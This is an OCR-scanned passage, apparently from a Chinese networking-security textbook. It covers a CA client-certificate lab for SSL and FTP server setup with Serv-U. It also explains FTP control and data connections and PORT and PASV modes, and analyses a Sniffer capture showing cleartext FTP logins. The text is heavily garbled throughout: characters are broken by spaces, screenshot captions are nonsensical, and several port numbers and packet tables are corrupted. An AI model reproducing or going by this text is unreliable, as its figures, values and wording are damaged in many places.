请 ,CA 审查 证 书 申请 合格 之 后 颁发 数字 证 书 , 之 后 Web 服务 器 安装 证 书 。 同 样 客户 也 
向 CA 申请 一 个 个 人 数字 证 书 。 最 后 客户 通过 加 密 通道 访问 Web 站 点 。 实 验 步 又 


如 下 。 
虚拟 机 1(CA 认 证 中 心 ) 
一 192.168.0.3 
@ 申 请 服务 器 证 书 @ 申 请 客户 证 书 
回 颁 发 证 书 
@ 颁 发 证 书 
虚拟 机 2(Web 服 务 器 ) 日 本 机 (客户 ) 
192.168.0.4 一 一 上 世 
加 加密 通 信 192.168.0.2 
加 安装 证 书 @ 安 装 证 书 
图 10-48 测试 环境 
第 一 步 : 按照 图 10-48 组 建 网 络 ,配置 IP 地 址 ,使 用 host-only 方式 连接 网 络 ( 步 
又 略 )。 


第 二 步 : Web 服务 器 申请 证 书 ,CA 颁发 证 书 ,Web 服务 器 安装 证 书 (步骤 略 ) 。 
第 三 步 : 客户 向 CA 认证 中 心 申请 个 人 数字 证 书 。 
客户 向 CA 认证 中 心 申请 个 人 数字 证 书 , 步 又 如 图 10-49 和 图 10-50 所 示 。 


/2 Wicrosoft 证 书 服务 Windows Internet Explorer 


GO©O- [图 Mttp: /ig2. 188.0.3/certsrv/ certraus asp 

文件 @) 编辑 于 ) 查看 QW 收 若 习 W) 工具 GD) 帮助 0D 
帘 收 藏 天 | 鹤 居 违 以 网 站 。 居 免费 Motmsil 各 ] 同 页 快讯 库 > 
靖 icrosoft 证 书 服务 i 


国 [@][ss| |x) [tive se» 


从 - 加 贮 ”页 面 和 ”安全 8) 工具- 作 - ” 


icrosoft 证 书 服务 一 xinx 
选择 申请 类 型 
请 选择 您 要 进行 的 申请 类 型 : 


@ 用 户 证 书 申请 : 
Web 浏览 器 证 : 


图 10-49 选择 申请 Web 浏览 器 证 书 


第 四 步 : CA 审核 颁发 证 书 (步骤 略 ) 。 
第 五 步 : 客户 下 载 并 安装 证 书 到 客户 机 的 浏览 器 中 。 
客户 下 载 并 安装 证 书 到 客户 机 的 浏览 器 中 。 步 又 如 图 10-51 一 图 10-55 所 示 。 


277 


图 http: 77192. 168.0.3/certsrv/certrabi. asp?type=0 Btr|[x| Live Sea Ea 
文件 旭 ” 纺 辑 如 ”查看 名 收 诚 兴 工具 Cf) 帮助 四 

帘 收藏 天 | 次 四 证 议 辣 站 ”加 免费 hotnail 四 

禾 遇 crosoft 证书 服务 团 - 口 坊 ” 页面 和 D- 安 @- IO- 加 - 


Web 浏览 器 证 书 - 标识 信息 | 
请 输入 将 在 您 的 证 书 中 出 现 的 标识 信息 
名 称 : | 徐 国 天 
电子 邮件 : |xgt888@126 .com 
公司 : [ccpc 
部 门 : | 
城市 : 
省 : 
国家 (地 区 ): 
更 多 选项 
选择 一 个 加 密 服 务 提 供 程序 : 
CSP: | Microsoft Base Cryptographic Provider v1.0 
口 启用 严格 密 宜 保护 


如 果 您 需要 一 个 不 在 这 里 的 高 级 选项 ， 请 使 用 高 级 证 书 申请 窗 体 。 


图 10-50 填写 个 人 信息 


2 Hicrosoft 证 书 服务 - Windows Internet Explorer x 
GO Bo 国 ®|[S[x| (Sus |] 
文件 外 ”编辑 加 ”查看 W) ”收藏 丈 公 ) 工具 TT) 帮助 人 0 

宣 收藏 天 | 次 下 是 以 网 站 ~ 站 和 要 mtsil 图 厅 

| 硬 丰 crosogt 证 书 服务 I 从- 馈 响 ”有 夯 四 ”安全 G) IRW- OO- ” 


有 icrosoft 证 书 服务 一 xinxi 


欢迎 


RE a 


选择 一 个 任务 : 

〇 检索 CA 证 书 或 证 书 吊 销 列表 
个 申请 证 书 

加 检查 挂 起 的 证 书 


图 10-51 检查 挂 起 的 证 书 


第 六 步 : 设置 Web 服务 器 接收 客户 数字 证 书 。 

在 Web 服务 器 的 IS 管理 器 中 右 击 站 点 名 称 一 "属性 ”目录 安全 性 ?一 在 “目录 安 
全 性 ”下 单 击 “ 编 辑 ”>“ 申 请 安全 通道 (SSL)”>“ 接 收 客户 证 书 ”, 见 图 10-56 。 

第 七 步 : 在 客户 机 访问 Web 服务 器 ,同时 使 用 Sniffer 捕获 加 密 通 信和 数据 。 


278 


访 
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AS 了 icrosoft 证 书 服务 - Windows Internet Ezplorer 
GO- 起 | http 192. 168. 0. 3/certsr k aa 
文件 中 ”编辑 于 ) 查看 QW) 收藏 严 具 ) 工具 XY) 帮助 0 

次 收藏 天 | 次 天 社 以 月 站 ”加 免费 otnail 居 

| 乱 遇 rosoft 证 书 服务 


局 咒 ”页 面 和 ”安全 6)， 工具 中 - 各- 


Wicrosoft 证 书 | 


检查 挂 起 的 证 书 申请 


请 选择 您 要 检查 的 证 书 申请 : 
Web 浏览 器 证 书 (2012 年 11 月 20 日 16:23 


图 10-52 选择 要 下 载 的 证 书 


CS Wicrosoft 证 书 服务 - Windows Internet Explorer 
GO Er mm ra 
文件 全 编辑 下) 查看 QW 收 疗 赤 愉 ) 工具 CI) 帮助 0 
次 收藏 天 | 次 癌 旦 以 有 站 ”加 免费 Hotnsil 加 ]F 

| 着 WierosoEt 证 书 服务 


icrosoft 证 书 | 


您 申请 的 证 书 已 发 布 给 您 。 
安装 此 证书 


图 10-53 ”安装 证 书 


/2 Hicrosoft 证 书 服务 - Windows Internet Explorer 
GO- 天 http //192. 168.0.3/ mn asp 
文件 GE) 编辑 下 ) 查看 GO) 收 着 严 公 ) 工具 CD) 帮助 00 

突 收 戌 天 | 次 加 之 F 由 免费 hotnail 加 

| 乱 遇 crosoft 证 书 服务 


可 icrosoft 证 书 | 
证 书 已 安装 
您 的 新 证 书 已 经 成 功 安装 。 


图 10-54 安装 完成 
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预期 目的 @@) : 所 有 ~ 


个 人 [其 节 人 | 中 级 证 书 颁 发 机 构 ‖ 受信 任 的 根 证 书 颁 发 机 构 | 受信 任 的 发 行者 | 时 


十 发 给 截止 日 期 | 好 记 的 名称 
国 徐 国 天 2013-1 E> 


导入 加 ) 导出 外) 


证 书 的 预期 目的 


查看 


图 10-55 在 客户 机 下 浏览 器 中 查看 安装 好 的 个 人 数字 证 书 


厂 启用 客户 证 书 映射 QD) 


编辑 全 ) 


厂 启用 证 书信 任 列表 名) 
当前 的 LD Ie—======== 


新 肖 @) | 编辑 0) | 
my | io | 
图 10-56 ”接收 客户 证 书 


1. HTTP 使 用 的 三 种 参数 提交 方式 , 即 GET、POST 和 Cookie 方式 有 什么 区 别 ? 
2. HTTP 的 缓存 机 制 起 什么 作用 ? 
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第 11 登 
HTTP 及 其 安全 问题 


文件 传输 协议 (File Transfer Protocol,FTP) 用 来 从 一 台 主 机 把 文件 复制 到 另 一 台 主 
机 。 向 FTP 服务 器 复制 文件 的 操作 称 为 上 传 , 从 FTP 服务 器 复制 文件 的 行为 称 为 下 载 。 
下 面 首先 学 习 FTP 服务 器 的 搭建 和 使 用 。 


11i FTP 服务 器 的 搭建 和 使 用 


FTP 服务 器 可 以 定义 两 种 类 型 客户 访问 方式 , 即 匿名 访问 和 通过 用 户 名 访问 。 匿 名 
访问 方式 不 需要 客户 提供 身份 验证 信息 ,任何 人 都 可 以 使 用 FTP 服务 器 资源 ,这 种 方式 
简单 .方便 ,但 安全 性 低 。 用 户 名 访问 方式 需要 客户 提供 合法 的 用 户 名 和 密码 ,通过 验证 
之 后 才 可 以 使 用 FTP 服务 器 资源 ,这 种 方式 安全 性 高 。FTP 服务 器 管理 员 还 可 以 为 特 
定 文件 夹 设置 访问 权限 ,例如 只 能 上 传 .不 能 下 载 。 下 面 通过 一 个 训练 来 学 习 FTP 服务 
器 的 搭建 和 使 用 方法 。 

训练 : 在 Windows XP 虚拟 机 上 搭建 一 台 FTP 服务 器 ,创建 一 个 账户 ,在 本 机 测试 
访问 FTP 服务 器 。 

第 一 步 : 以 host-only 方式 启动 Windows XP 虚拟 机 ,配置 IP 地 址 ,测试 通信 情况 。 

以 host-only 方式 启动 Windows XP 虚拟 机 ,配置 IP 地 址 为 192. 168. 0. 2, Windows 
XP 虚拟 机 作为 FTP 服务器。 本 机 的 IP 地 址 为 192. 168. 0. 5, 本 机 作为 客户 端 。 使 用 
ping 命令 测试 本 机 和 Windows XP 虚拟 机 之 间 的 通信 情况 。 

第 二 步 : 在 Windows XP 虚拟 机 上 安装 FTP 服务 器 软件 Serv-U( 步 又 略 ) 。 

第 三 步 : 在 FTP 服务 器 端 创建 一 个 用 户 peter。 

在 FTP 服务 器 端 创建 一 个 用 户 peter。 在 Serv-U 的 管理 控制 台 主 页 单 击 创建 、 修 改 
和 删除 用 户 账户 一 单 击 “添加 ”一 登录 ID 输入 peter 习 密码 输入 86982480 一 根 目 录 选 择 
EE:\peter 文件 夹 ,设置 界面 如 图 11-1 所 示 。 

登录 ID 即 为 用 户 名 , 根 目 录 是 指 peter 用 户 登 录 FTP 服务 器 之 后 看 到 的 文件 夹 。 
锁定 用 户 至 根 目 录 是 指 限定 peter 用 户 只 能 在 自己 的 目录 内 活动 。 目 前 这 个 用 户 还 不 能 
使 用 ,需要 为 根 目录 设置 访问 权限 。 单 击 * 目 录 访 问 ” 一 单 击 * 添 加 ”一 路 径 选 择 E:\peter 
一 选中 * 读 ?“ 写 ?权限 一 单 击 * 保 存 ? 按 钮 ,设置 界面 如 图 11-2 所 示 。 

路 径 选 择 peter 用 户 的 根 目 录 , 读 权限 代表 可 以 下 载 文 件 , 写 权限 代表 可 以 上 传 文 
件 。peter 用 户 不 具备 追加 、 删 除 .执行 . 重 命名 权限 。 

第 四 步 : 查看 Windows XP 虚拟 机 的 FTP 服务 端口 是 否 打 开 。 
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» 用 户 屋 性 - peter 


| 用 户 信 息 | 群 组 [欢迎 消 息 | IP 访问 [目录 访问 | 虚拟 路 径 | 限制 和 设置 | 事件 | 


& 用 户 账户 信息 指定 授予 该 账户 的 登录 其 证 和 权限 。 


登录 ID: 全 名 

peter 

密码 根 目 录 ; 

86982480 (@] [Epeter 马 四 | 

管理 权限 SSH 公共 密 铀 路径: 

| 无 权限 司 | 创建 密 钥 对 


账户 类 型 、 
ER 避 
中 W Web 客户 请 


[ 国 示 用 户 使 用 何 种 客户 靖国 | 。 回 包 定 用 户 至 根 目录 
电子 邮件 地 址 回 总 是 允许 登录 
- 用 户 必须 在 下 一 次 登录 时 更 改 密码 
回 启用 账户 


说 明 | 


二 [加 可 性 | 


图 11-1 输入 账户 信息 


甩 日 录 访 问 规则 
路 径 保存 
IE:/peter = 
L 取消 
文件 目录 
回 读 口 出 除 加 列表 GJ 
回 写 执行 外 创建 
追加 重合 名 EZIEN 
重 命名 删除 只 读 
目录 内 容 的 最 大 尺寸 
二 MB《 留 空 则 无 限制 ) 
高 级 >> 


图 11-2 设置 目录 访问 权限 


如 果 配 置 正 确 , Windows XP 虚拟 机 的 FTP 服务 端口 21 将 处 于 打开 状态 ,可 以 使 用 
netstat -an 命令 查看 ,结果 如 图 11-3 所 示 , 可 见 TCP 的 21 端口 处 于 开放 状态 ,说 明 FTP 
服务 器 运行 正常 。 

C:\Documents and Settings\Younetstat -an 


Active Connections 


Proto Local Address State 
* .0: LISTENING 
LISTENING 
LISTENING 


图 11-3 TCP21 端口 已 经 打开 
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第 五 步 : 在 本 机 访问 FTP 服务 器 。 
在 本 机 的 正 浏 览 器 地 址 栏 中 输入 “FTP://192. 168. 0. 2”, 在 登录 窗口 输入 用 户 名 
peter ,密码 86982480, 单 击 “ 登 录 ” 按 钮 ,如 图 11-4 所 示 。 


2 服务 器 不 允许 匿名 登录 ,或 者 不 接受 该 电子 邮件 地 址 。 


FTP 服务 器 : 192.168.0.2 

用 户 名 四 : peter 

密码 邓 ): ee 

登录 后 ,可 以 将 这 个 服务 器 添加 到 黎 的 收 诚 夹 ， 以 便 轻 易 返回 。 


A 守 捕 坟 ne 要 保护 密码 和 数 


Learn nore about using Web Folders 
口 匿 名 登录 以) 口 保存 密码 @) 


图 11-4 登录 窗口 


登录 成 功 之 后 可 以 看 到 如 图 11-5 所 示 的 窗口 ,查看 到 的 就 是 Windows XP 虚拟 机 
E:\peter 文件 夹 下 的 内 容 , 用 户 可 以 向 该 文件 夹 上 传 或 下 载 文 件 , 但 不 能 执行 删除 . 重 命 
yl ftp://192. 168. 0. 2/ 


文件 @) ”编辑 下 ) 查看 Q) 收藏 &) 工具 CY) 帮助 


@ 痕 -上 旭 - 访 请 欣 入 文 4 |[ 国 - 


图 ee:i/lsz.lt802 


名 Internet Explorer 
加 我 的 文档 
共享 文档 


图 11-5 登录 成 功 


112 ”FTP 使 用 两 条 逻辑 连接 


FTP 与 其 他 应 用 层 协议 (例如 HTTP、SMTP) 的 不 同 之 处 在 于 它 在 客户 与 服务 器 之 
间 建 立 两 条 逻辑 连接 。 一 条 是 控制 连接 ,使 用 TCP21 端口 ,用 于 传送 控制 命令 ,例如 上 
传 . 下 载 、 删 除 、 重 命名 等 。 另 一 条 是 数据 连接 ,使 用 TCP20 端口 ,用 于 传送 具体 的 文件 数 
据 , 即 上 传 、 下 载 的 文件 数据 通过 数据 连接 传递 。 

客户 从 登录 FTP 服务 器 开始 到 关闭 浏览 器 结束 是 一 次 完整 的 会 话 过 程 。 在 这 个 过 
程 中 使 用 了 一 条 控制 连接 ,多 条 数据 连接 ,每 条 数据 连接 完成 一 个 任务 ,例如 上 传 或 下 载 
三 个 交 件 。 
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请 ”控制 连接 和 数据 连接 的 建立 过 
11.3.1 控制 连接 的 建立 


程 


控制 连接 的 建立 过 程 如 图 11-6 所 示 。 首 先 服务 器 打开 TCP21 端口 等 待 连接 ,客户 


选择 一 个 随机 端口 620 


连接 始终 存在 。 

控制 进程 _。 71 | 之 币 浊 各 
数据 进程 [数据 进程 

服务 器 

(a) 由 服务 器 被 动 打开 
控制 进程 62010] 2 
主动 打开 
数据 进程 数据 进程 
客户 服务 器 


(b) 由 客户 主动 连接 
图 11-6 控制 连接 的 建立 过 程 


0 主动 与 服务 器 建立 一 条 TCP 控制 连接 ,在 整个 会 话 过 程 中 这 条 


图 11-7 是 在 FTP 服务 器 端 使 用 netstat -an 命令 查看 到 的 控制 连接 建立 过 程 。 


Proto Local Address 


Foreign Address State 
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 
(Ca) FTP 服务 器 打开 21 端 口 等 待 连接 请 求 
TC 192.168.0.2:21 192.168.0.5:1154 ESTABLISHED 


(b) 客户 与 服务 器 建立 了 一 条 控制 连接 
图 11-7 使 用 netstat -an 命令 查看 到 的 控制 连接 


11.32 服务 器 主动 方式 建立 数据 连接 (PORT 方 式 ) 
数据 连接 有 两 种 建立 方式 ,第 一 种 是 服务 器 主动 方式 ,也 称 为 PORT 方式 。 这 种 方 


式 的 连接 建立 过 程 如 图 11-8 所 示 。 首 先 客户 进程 打开 一 个 随机 端 


63000 ,客户 在 这 个 


端口 等 待 服务 器 发 起 主动 连接 请 求 。 由 于 服务 器 并 不 知道 客户 选择 
客户 在 控制 连接 上 使 用 一 条 PORT 命令 将 随机 63000 通知 给 月 


» 


师 


会 使 用 TCP20 端口 主动 与 客户 的 63000 端口 建立 一 条 数据 连接 。 这 


的 随机 端口 号 ,因此 


民 务 器 。 之 后 服务 天 
条 连接 由 服务 器 主 


动 请 求 建立 , 即 TCP 第 一 次 握手 报 文 由 服务 器 发 出 ,因此 将 这 种 方式 称 为 服务 器 主动 


老式 5 
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控制 进程 162010 | 一 一 一 一 一 [21 | 控制 进程 


数据 进程 _63000 数据 进程 
客户 服务 器 
(a) 客户 打开 端口 
== PORT 63000 === 
控制 进程 [62010]~= 一 一 一 一 21 | 控制 进程 
数据 进程 | 63000 ] 被动 打开 数据 进程 
客户 服务 器 
(b) 把 短暂 端口 号 发 送 给 服务 器 
控制 进程 [62010]~ 一 一 一 一 一 [21 | 控制 进程 
-一 [30 | 数据 进程 | 
数据 进程 | 63000 20 | 数据 进程 
客户 服务 器 
(c) 由 服务 器 主动 连接 


图 11-8 服务 器 主动 方式 建立 数据 连接 


11.3.3 客户 主动 方式 建立 数据 连接 (PASV 方式 ) 


第 二 种 连接 建立 方式 是 客户 主动 方式 ,也 称 为 PASV 方式 。 这 种 方式 的 连接 建立 过 
程 如 图 11-9 所 示 。 服 务 器 首先 打开 一 个 随机 端口 2001 等 待 客户 连接 。 由 于 客户 并 不 了 


控制 进程 62010 21 | 控制 进程 
数据 进程 2001 | 数据 进程 
客户 服务 器 


(a) 服务 器 打开 2001 


控制 进程 Lo UD A 生 省 31 ] 控制 进程 


数据 进程 200T | 数据 进程 
客户 服务 器 


(b) 把 短暂 端口 号 发 送 给 客户 


控制 进程 [62010 ~ 一 一 一 一 一 [21 | 控制 进程 
数据 进程 | 635000 |~ 一 一 一 一 一 [2001 | 数据 进程 
客户 服务 器 


(0) 由 客户 主动 连接 
图 11-9 客户 主动 方式 建立 数据 连接 
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解 服务 器 选择 的 随机 端口 号 ,因此 服务 器 在 控制 连接 上 给 客户 发 送 了 一 条 PASV 指令 ， 
将 自己 选择 的 随机 端口 2001 通知 给 客户 。 之 后 客户 使 用 随机 端口 63000 主动 与 服务 器 
的 2001 端口 建立 一 条 数据 连接 。 由 于 这 条 TCP 连接 的 第 一 次 握手 报 文 由 客户 主动 发 
出 ,因此 称 这 种 方式 为 客户 主动 方式 。 

为 什么 设计 两 种 数据 传输 模式 呢 ? 主要 是 为 了 使 FTP 能 够 适应 不 同 的 网 络 环境 。 
考虑 下 面 这 种 情况 ,在 使 用 专用 地 址 的 内 部 网 络 主机 访问 因特网 FTP 服务 器 。 这 种 情况 
下 TCP 连接 必须 由 内 部 网 络 的 客户 机 主动 发 起 ,这 样 经 过 NAT 路 由 器 的 转换 才能 实现 
内 ,外 网 的 通信 。 因 此 这 种 情况 只 能 使 用 PASYV 方式 ,而 不 能 使 用 PORT 方式 。 如 果 在 
具有 全 局 合法 IP 地 址 的 主机 上 访问 FTP 服务 器 ,那么 两 种 模式 都 可 以 使 用 。 


114 ”FTP 的 数据 传送 过 程 


114.1 目录 数据 的 传送 过 程 


客户 登录 FTP 服务 器 之 后 会 看 到 根 目录 下 的 文件 信息 ,这 些 目录 数据 是 从 服务 器 端 
传送 到 客户 端的 。 图 11-10 给 出 的 是 目录 数据 的 传送 过 程 。 


客户 控制 连接 服务 器 。 客户 数据 连接 服务 器 

-| 220( 服 务 就 结 ) |— 
USER jack | 
一 ， 331 (name ok pass?) | 
PASS 1234 me 
一 ”230G 册 成 功 上 | 
mm PORT 8888 
| 一 -| 150( 数 据 连 接 将 打开 ) | 一 
LIST/user | 
一] 125( 数 据 连 接 正确 |- 

EEC 

-ER | 
一 226( 数 据 连接 关闭 ) 上 
QUIT | 
一 221( 服 务 关闭 ) 广 


1 1 了 
图 11-10 浏览 目录 的 通信 过 程 


一 


图 左 侧 是 控制 连接 ,用 于 传送 控制 命令 , 右 侧 是 数据 连接 。 首 先 客 户主 动 与 服务 器 的 
TCP21 端口 建立 一 条 控制 连接 (通过 TCP 的 三 次 握手 机 制 ) ,连接 建立 起 来 之 后 服务 器 
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返回 220 响应 ,代表 服务 器 准备 就 绪 。 客 户 发 出 一 条 USER 指令 ,参数 是 用 户 名 jack, 服 
务 器 验证 确实 存在 用 户 名 为 jack 的 用 户 ,于 是 返回 331 响应 ,代表 用 户 名 正确 ,请 提供 密 
码 。 客 户 通过 一 条 PASS 指令 将 密码 1234 发 送 给 服务 器 ,服务 器 验证 密码 正确 ,于 是 返 
回 230 响应 ,代表 客户 已 经 通过 身份 验证 。 

之 后 客户 选择 以 PORT 方式 建立 数据 连接 ,于 是 向 服务 器 发 送 一 条 PORT 指令 ,将 
选择 的 端口 号 8888 通知 给 服务 器 。 服 务 器 返回 150 响应 ,代表 数据 连接 即将 建立 。 客 户 
发 出 LIST 指令 ,请 求 浏览 根 目录 下 user 文件 夹 内 的 目录 数据 。 在 这 之 后 通信 转换 到 数 
据 连 接 , 服 务 器 主动 与 客户 的 8888 端口 建立 一 条 数据 连接 ,然后 通过 一 组 数据 包 将 user 
文件 夹 下 的 目录 数据 传送 给 客户 ,目录 传送 完成 之 后 ,客户 与 服务 器 通过 TCP 四 次 挥手 
机 制 中 断 这 条 数据 连接 。 通 信 重 新 回 到 控制 连接 ,服务 器 返回 226 响应 ,代表 数据 连接 关 
闭 。 此 后 客户 没有 进行 其 他 的 操作 (例如 上 传 .下 载 文 件 ) ,而 是 直接 关闭 了 浏览 器 窗口 ， 
客户 向 服务 器 发 送 一 条 QUIT 指令 请 求 退出 ,服务 器 返回 221 响应 ,代表 关闭 服务 。 最 
后 客户 与 服务 器 通过 TCP 四 次 挥手 机 制 中 断 这 条 控制 连接 。 


1142 文件 数据 的 传送 过 程 


在 11.4.1 节 的 例子 中 ,假设 客户 浏览 目录 数据 之 后 没有 关闭 浏览 器 窗口 ,而 是 向 服 
务 器 上 传 了 一 个 文件 hao, 那 么 上 传 文件 的 通信 过 程 如 图 11-11 所 示 。 


客户 控制 连接 服务 器 ”客户 数据 连接 服务 器 
PORT 9999 上 一 | 
| 150( 数 据 连接 将 打开 ) 
TYPE EBCDIC EF 
一 200( 正 确 ) | 
STRU R mn 
1 200( 正 确 ) 
STOR/user/hao | 
-村 250( 正 确 ) [一 
ER 一 
ES 一 
[| 226( 数 据 连接 关闭 ) 站 
QUIT 一 
| 221( 服 务 关闭 ) 


一 


1 1 了 
图 11-11 上 传 文件 的 过 程 


客户 通过 一 条 PORT 指令 将 端口 号 9999 传送 给 服务 器 (该 端口 用 于 数据 连接 ), 服 
务 器 返回 150 响应 ,代表 数据 连接 即将 打开 。 客 户 发 出 一 条 TYPE 指令 定义 文件 类 型 为 
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EBCDIC。FTP 支持 三 种 类 型 的 文件 ,第 一 种 是 ASCII 文 件 , 这 是 传送 文本 文件 的 默认 格 
式 , 每 个 字符 都 采用 ASCII 编码 ,发 送 方 把 要 传送 的 文件 由 原来 的 格式 转换 为 ASCII 字 
符 ,接收 方 将 收 到 的 ASCII 字符 还 原 为 原来 的 编码 格式 。 第 二 种 是 EBCDIC 文件 ,如 果 
通信 的 一 方 或 者 双方 使 用 EBCDIC 编码 (IBM 计算 机 使 用 的 编码 方案 ) ,那么 可 以 使 用 
EBCDIC 编码 传送 文件 。 第 三 种 是 图 像 文件 ,这 是 二 进 制 文件 传输 的 默认 格式 ,文件 以 连 
续 的 字 节 流 发 送 ,不 需要 任何 编码 操作 ,多 数 情况 用 于 传送 二 进 制 文件 ,如 编译 之 后 的 程 
序 、 图 像 .语音 视频 数据 。 

之 后 服务 器 返回 200 响应 ,代表 正确 接收 了 TYPE 指令 。 客 户 发 出 STRU 指令 , 参 
数 R 代表 数据 传送 采用 记录 结构 。FTP 定义 了 三 种 文件 传送 结构 ,第 一 种 是 文件 结构 ， 
参数 用 下 表示 ,这 种 文件 没有 结构 ,是 连续 的 字 节 流 。 第 二 种 是 记录 结构 ,参数 用 R 表 
示 , 这 种 文件 被 划分 为 记录 ,只 能 用 于 传送 文本 文件 。 第 三 种 是 页 结构 ,参数 用 了 表示 ， 
这 类 文件 被 划分 为 页 ,每 页 有 一 个 页 号 和 页 头 , 页 可 以 随机 或 顺序 地 存储 和 访问 。 

客户 发 出 STOR 命令 ,请求 上 传 文件 到 user 文件 夹 下 ,名 称 为 hao。 服 务 器 返回 250 
响应 。 之 后 通信 转换 到 数据 连接 ,服务 器 主动 与 客户 的 9999 端口 建立 一 条 数据 连接 , 然 
后 客户 通过 若干 个 数据 包 将 文件 hao 传送 给 服务 器 ,文件 传送 完成 之 后 ,这 条 数据 连接 被 
正常 终止 ,通信 回 到 控制 连接 。 

通过 上 面 的 分 析 可 以 进一步 验证 在 整个 会 话 过 程 中 只 有 一 条 控制 连接 ,而 采用 了 多 
条 数据 连接 ,每 条 数据 连接 完成 一 个 特定 的 任务 。 


11.5 利用 Sniffer 分 析 FTP 的 通信 过 程 


训练 : 在 Windows XP 虚拟 机 上 搭建 一 台 FTP 服务 器 ,登录 FTP 服务 器 ,上 传 一 个 
文件 ,再 下 载 一 个 文件 ,然后 关闭 IE 浏览 器 。 使 用 Sniffer 捕获 整个 通信 过 程 产 生 的 通信 
数据 ,之 后 分 析 数 据 回 答 以 下 问题 : 

(1) 控制 连接 使 用 的 客户 和 服务 器 端口 号 是 多 少 ? 

(2) 在 整个 会 话 过 程 中 建立 了 几 条 数据 连接 ? 每 条 数据 连接 的 客户 和 服务 器 端口 号 
是 多 少 ? 每 条 数据 连接 的 作用 是 什么 ? 

第 一 步 : 以 host-only 方式 启动 Windows XP 虚拟 机 ,配置 IP 地 址 ,测试 通信 情况 。 

以 host-only 方式 启动 Windows XP 虚拟 机 ,配置 IP 地 址 为 192. 168. 0. 2, Windows 
XP 虚拟 机 作为 FTP 服务器。 本 机 的 IP 地 址 为 192. 168. 0. 5, 本 机 作为 客户 端 。 使 用 
ping 命令 测试 本 机 和 Windows XP 虚拟 机 之 间 的 通信 情况 。 

第 二 步 : 在 Windows XP 虚拟 机 上 安装 FTP 服务 器 软件 Serv-U ,在 FTP 服务 器 端 
创建 一 个 用 户 peter( 步 又 略 ) 。 

第 三 步 : 在 本 机 使 用 peter 用 户 登 录 FTP 服务 器 ,上 传 hello. txt, 下 载 1. html, 关 闭 
浏览 器 窗 体 。 使 用 Sniffer 捕获 整个 过 程 产生 的 通信 数据 (步骤 略 ) 。 

第 四 步 : 分 析 捕获 的 数据 ,回答 以 上 问题 。 

共 捕 获 到 93 个 数据 包 , 图 11-12 给 出 的 是 控制 连接 。 编 号 1.2 的 数据 包 是 客户 使 用 
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ARP 获得 FTP 服务 器 的 MAC 地 址 。 编 号 3、4、5 的 数据 包 是 客户 主动 向 服务 器 发 起 的 
TCP 三 次 握手 建立 连接 过 程 , 可 见 客户 端口 为 随机 端口 1150, 服 务 器 端口 为 知名 端口 

。 最 后 4 个 数据 包 ( 即 编号 90 一 93 的 报 文 ) 是 客户 与 服务 器 通过 TCP 四 次 挥手 中 断 控 
和 可 见 在 会 话 开始 时 建立 控制 连接 ,在 会 话 完全 结束 时 终止 控制 连接 。 


VHWareC00001 |Broadcast ARE 


192.168 
192: 158; 1 让 和 


osoroeoe Be ee 

31 0 WIN=65535, 

3 Ee- 1512: 833 IEN=0 WIN=64240 
634 WIN=65535 


eewmPl 


[192.168.0.5] |[192.168.0.2 


[192.168.0.5] 
[192.168.0.2] 
[192.168.0.2] 
[192.168.0.5] 


[192.168.0.2] |TC 
[192.168.0.5] |TCP 

[192.168.0.5] |TCP; D=1150 
[192.168.0.2] |TCP: D-21 S: 


129512 LEN=0 WIN=64564 


4 
169605 LEN=0 WIN=64044 
4 


图 11-12 唯一 的 控制 连接 


编号 6 一 22 的 数据 包 如 图 11-13 所 示 , 其 中 包含 身份 验证 和 确认 数据 连接 端口 的 过 
程 ,下 面具 体 分 析 。 编 号 6 一 10 的 数据 包 是 身份 验证 过 程 ,客户 提交 的 用 户 名 peter、 密 码 
2480 通过 了 服务 器 的 身份 验证 ,如 图 所 示 FTP 的 用 户 名 和 密码 以 明文 方式 传送 ,因此 安 
全 性 较 低 。 

第 21 个 报 文 是 客户 发 给 服务 器 的 一 条 PASYV 指令 ,表示 客户 请 求 采用 PASYV 方式 ， 
即 以 客户 主动 的 方式 建立 数据 连接 。 第 2 个 数据 包 是 眼 务 澡 将 选 定 的 随机 端口 通 知 闪 
客户 ,这 里 参数 采用 (IP,n,m) 的 格式 ,IP 为 FTP 服务 器 的 IP 地 址 192. 168. 0. 2。7 7 
代表 服务 器 选 定 的 随机 端口 ,计算 公式 为 端口 号 二 nX256 十 m, 本 例 的 随机 端口 = 二 17 xX 
256 十 98 二 4450。 


a 
UTFS is set to ON 


rrent directory 


D 
0 Directory changed to 
E 


图 11-13 身份 验证 过 程 


图 11-14 是 第 一 条 数据 连接 ,编号 23、24、25 的 数据 包 是 三 次 握手 建立 这 条 数据 连 
接 。 可 见 客户 发 出 了 第 一 次 握手 报 文 , 主 动 连接 服务 器 的 4450 端口 ,客户 端 选择 的 是 随 
机 端口 1151。 编 号 26 的 数据 包 是 客户 在 控制 连接 上 向 服务 器 传递 了 一 条 LIST 指令 ,请 
求 浏览 根 目录 信息 。 

编号 30 的 数据 包 是 服务 器 通过 数据 连接 将 根 目 录 信 息 返 回 给 客户 。 图 11-14 下 部 
给 出 的 就 是 编号 30 的 数据 包 内 容 , 可 见 在 应 用 层 数据 中 携带 的 就 是 目录 数据 。 在 根 目录 
中 包含 两 个 文件 ,一 个 文件 是 1. html, 大 小 为 31 字 节 ,创建 时 间 是 2012-10-07 08:39。 
第 二 个 文件 名 称 中 含有 汉字 ,Sniffer 在 解析 时 出 现 错误 ,因此 变 成 乱码 ,但 文件 名 中 的 字 
符 数据 仍然 可 读 ,可 以 看 出 这 是 一 个 doc 文件 ,大 小 为 26 624 字 节 ,创建 时 间 为 2012-11- 
29 05:41。 
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了 UIIZ T6805T TIIIZ-I68-0-2] | = R SEQ=307TS56937U LEN=U WIN=6 

24 |[192.168.0.2] |[192.168.0.5] =1 71569471 SEQ=2555573727 LEN=0 WIN=64240 
25 |[192.168.0.5] |[192.168.0.2] =4 55573728 WIN=65535 

26 |[192.168.0.5] |[192.168.0.2] |FTP: C PORT=1150 LIST 

27 0.2] ] |WINS: C 3457 OP=QUERY NAME=#<0000000000000000000000000000><00> 
28 0.5] | 及 3457 OP-OQUERY STA 

29 0 RE 


151 71569471 SEQ=2555573899 IEN=0 Wi 
D=4450 S=1151 55573900 WIN=65364 

TCP: D=4450 S=1151 FIN 4 55573900 SEQ=3071569471 LEN=0 WIN=65364 
TCP; D=1151 S=4450 71569472 WIN=64240 


0 e0 ed eo e0 e0 05 00 45 00 We EE 
0 80 06 ab 51 c0 a8 00 02 c0 a8 . 吊 o@.¢. 效 括 .. 括 
0000020: 00 05 11 62 04 7f 98 52 ft5 e0 b7 14 6e 3f 80 18 ..b.1 析 是 7n7 
